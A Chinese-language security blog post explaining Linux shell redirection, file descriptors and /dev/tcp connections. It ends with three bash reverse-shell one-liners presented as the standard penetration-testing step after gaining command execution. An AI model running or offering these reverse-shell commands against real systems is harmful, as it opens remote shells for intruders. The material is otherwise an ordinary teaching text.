<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.ico?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.ico?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="shell," />










<meta name="description" content="还没搞懂command &amp;gt;file 2&amp;gt;&amp;amp;1？怎么回事">
<meta name="keywords" content="shell">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux重定向">
<meta property="og:url" content="/2017-12-24-Linux-redirection/index.html">
<meta property="og:site_name" content="Security blog">
<meta property="og:description" content="还没搞懂command &amp;gt;file 2&amp;gt;&amp;amp;1？怎么回事">
<meta property="og:updated_time" content="2017-12-25T03:00:01.938Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux重定向">
<meta name="twitter:description" content="还没搞懂command &amp;gt;file 2&amp;gt;&amp;amp;1？怎么回事">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="/2017-12-24-Linux-redirection/"/>





  <title>Linux重定向 | Security blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Security blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="/2017-12-24-Linux-redirection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ꭰ">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Security blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Linux重定向</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-12-24T15:39:27+08:00">
                2017-12-24
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Linux/" itemprop="url" rel="index">
                    <span itemprop="name">Linux</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>还没搞懂<em>command &gt;file 2&gt;&amp;1</em>？怎么回事<a id="more"></a></p>
<h3 id="标准输出、输入、错误"><a href="#标准输出、输入、错误" class="headerlink" title="标准输出、输入、错误"></a>标准输出、输入、错误</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span> stdout</div><div class="line">root@debian:~# ls /</div><div class="line">bin   initrd.img  lib64 proc srv var boot  lost+found  root swap  vmlinuz  dev   media   run   sys   vmlinuz.old etc   mnt sbin     tmp home  lib                                                   opt   shadowsocksr  usr</div><div class="line"><span class="meta">#</span> stderr </div><div class="line">root@debian:~# ls test</div><div class="line">ls: cannot access 'test': No such file or directory</div><div class="line"><span class="meta">#</span> stdin</div><div class="line">root@debian:~# cat</div><div class="line">test</div><div class="line">test</div></pre></td></tr></table></figure>
<h3 id="文件描述符"><a href="#文件描述符" class="headerlink" title="文件描述符"></a>文件描述符</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 ---&gt; stdin</div><div class="line">1 ---&gt; stdout</div><div class="line">2 ---&gt; stderr</div></pre></td></tr></table></figure>
<p>为什么标准输出、输入、错误的输出都呈现在终端呢？在你启动<em>bash</em>的时候，它会同时打开三个标准的文件描述符0、1、2，并且它们都是指向<em>/dev/tty0</em>。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 -----------&gt;  /dev/tty0</div><div class="line">1 -----------&gt;  /dev/tty0</div><div class="line">2 -----------&gt;  /dev/tty0</div></pre></td></tr></table></figure></p>
<h4 id="新建文件描述符"><a href="#新建文件描述符" class="headerlink" title="新建文件描述符"></a>新建文件描述符</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">exec 3&gt;file</div><div class="line">ls &gt;&amp;3</div><div class="line">exec 3&lt;file</div><div class="line">cat &lt;&amp;3</div><div class="line">exec 3&lt;&gt;file</div></pre></td></tr></table></figure>
<h4 id="删除文件描述符"><a href="#删除文件描述符" class="headerlink" title="删除文件描述符"></a>删除文件描述符</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">exec 3&gt;&amp;-</div></pre></td></tr></table></figure>
<h3 id="重定向标准输出和错误"><a href="#重定向标准输出和错误" class="headerlink" title="重定向标准输出和错误"></a>重定向标准输出和错误</h3><p><strong>特殊的缩写模式</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">command &amp;&gt; file</div></pre></td></tr></table></figure>
<p><em>&amp;&gt;</em>是<em>bash</em>的重定向标准输出和错误的<em>shortcut</em></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">command &gt;&amp; file</div></pre></td></tr></table></figure>
<p>常用的是第一种模式</p>
<p><strong>另一种写法</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">command &gt;file 2&gt;&amp;1   # 正确写法</div><div class="line">command 2&gt;&amp;1 file    # 错误写法</div></pre></td></tr></table></figure>
<p>这怎么理解呢？为什么第一种写法正确，第二种写法错误呢？先来看第一条命令<em>command &gt;file 2&gt;&amp;1</em><br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 -----------&gt;  /dev/tty0</div><div class="line">1 -----------&gt;  /dev/tty0</div><div class="line">2 -----------&gt;  /dev/tty0</div></pre></td></tr></table></figure></p>
<p><em>&gt;file</em>其实就是<em>1&gt;file</em>，<em>bash</em>将<em>stdout</em>重定向至<em>file</em>文件。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 -----------&gt;  /dev/tty0</div><div class="line">1 -----------&gt;  file</div><div class="line">2 -----------&gt;  /dev/tty0</div></pre></td></tr></table></figure>
<p>接着<em>2&gt;&amp;1</em>，可以理解为<em>stderr</em>的内容复制了一份给<em>&amp;1</em>即<em>file</em>。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 -----------&gt;  /dev/tty0</div><div class="line">1 -----------&gt;  file</div><div class="line">2 -----------&gt;  file</div></pre></td></tr></table></figure></p>
<p>接着我们来看第二条命令<em>command 2&gt;&amp;1 &gt;file</em></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 -----------&gt;  /dev/tty0</div><div class="line">1 -----------&gt;  /dev/tty0</div><div class="line">2 -----------&gt;  /dev/tty0</div></pre></td></tr></table></figure>
<p>首先是<em>2&gt;&amp;1</em>，因为<em>&amp;1</em>指向的是<em>/dev/tty0</em>，所以将<em>stderr</em>重定向至1时，依然是<em>/dev/tty0</em></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 -----------&gt;  /dev/tty0</div><div class="line">1 -----------&gt;  /dev/tty0</div><div class="line">2 -----------&gt;  /dev/tty0</div></pre></td></tr></table></figure>
<p>接着<em>&gt;file</em>，由于此时将<em>stdout</em>指向了<em>file</em>，而<em>stderr</em>并未发生改变，所以<em>command &gt;file 2&gt;&amp;1</em>命令无法将<em>stdout</em>和<em>stdin</em>同时重定向到<em>file</em>文件中。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">0 -----------&gt;  /dev/tty0</div><div class="line">1 -----------&gt;  file</div><div class="line">2 -----------&gt;  /dev/tty0</div></pre></td></tr></table></figure>
<p>注意：<strong>为了便于理解，可以将<em>&amp;</em>看作指针，<em>&amp;1</em>即指向其所在文件的位置，切勿看成引用</strong></p>
<h3 id="特殊重定向"><a href="#特殊重定向" class="headerlink" title="特殊重定向"></a>特殊重定向</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">command &gt;/dev/null 2&gt;&amp;1   # 丢掉命令的标准输出和标准错误</div></pre></td></tr></table></figure>
<h3 id="访问网站"><a href="#访问网站" class="headerlink" title="访问网站"></a>访问网站</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">echo 3&lt;&gt;/dev/tcp/www.google.com/80</div><div class="line">echo -e &quot;GET / HTTP/1.1\n\n&quot; &gt;&amp;3</div><div class="line">cat &lt;&amp;3</div></pre></td></tr></table></figure>
<p><em>/dev/tcp/host/port</em>是个特殊文件，简单说就是用来通过<em>bash</em>建立<em>tcp</em>链接的。当然也可以使用<em>UDP</em></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">echo 3&lt;&gt;/dev/udp/www.google.com/80</div><div class="line">echo -e "GET / HTTP/1.1\n\n" &gt;&amp;3</div><div class="line">cat &lt;&amp;3</div></pre></td></tr></table></figure>
<h3 id="彩蛋？反弹shell"><a href="#彩蛋？反弹shell" class="headerlink" title="彩蛋？反弹shell"></a>彩蛋？反弹shell</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">bash -i &gt;&amp; /dev/tcp/10.0.0.1/2233 0&gt;&amp;1</div></pre></td></tr></table></figure>
<p>在渗透过程中能够执行命令了，那么为了反弹shell一般都会执行上述这条命令。如果你理解以上内容，那么这部分也能搞定了。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">bash -i &amp;&gt; /dev/tcp/10.0.0.1/2233 0&gt;&amp;1</div></pre></td></tr></table></figure>
<p>再比如下面这种写法也是可以的</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">bash -i &gt;/dev/tcp/10.0.0.1/2233 2&gt;&amp;1 0&gt;&amp;1</div></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/shell/" rel="tag"># shell</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017-12-15-Basics-Of-Nmap-and-Masscan/" rel="next" title="Basics Of Nmap and Masscan">
                <i class="fa fa-chevron-left"></i> Basics Of Nmap and Masscan
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017-12-31-lucky-to-get-root/" rel="prev" title="碰巧就成为root了？">
                碰巧就成为root了？ <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODY0MC81MjEx"></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Ꭰ</p>
              <p class="site-description motion-element" itemprop="description">Me. a lazy person</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">46</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">43</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://suroot.cn" title="c0rpse" target="_blank">c0rpse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.th1s.cn" title="th1s" target="_blank">th1s</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jkme.github.io" title="jkme" target="_blank">jkme</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#标准输出、输入、错误"><span class="nav-number">1.</span> <span class="nav-text">标准输出、输入、错误</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件描述符"><span class="nav-number">2.</span> <span class="nav-text">文件描述符</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#新建文件描述符"><span class="nav-number">2.1.</span> <span class="nav-text">新建文件描述符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#删除文件描述符"><span class="nav-number">2.2.</span> <span class="nav-text">删除文件描述符</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#重定向标准输出和错误"><span class="nav-number">3.</span> <span class="nav-text">重定向标准输出和错误</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#特殊重定向"><span class="nav-number">4.</span> <span class="nav-text">特殊重定向</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#访问网站"><span class="nav-number">5.</span> <span class="nav-text">访问网站</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#彩蛋？反弹shell"><span class="nav-number">6.</span> <span class="nav-text">彩蛋？反弹shell</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ꭰ</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a></div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  





  

  

  

  
  

  

  

  

</body>
</html>
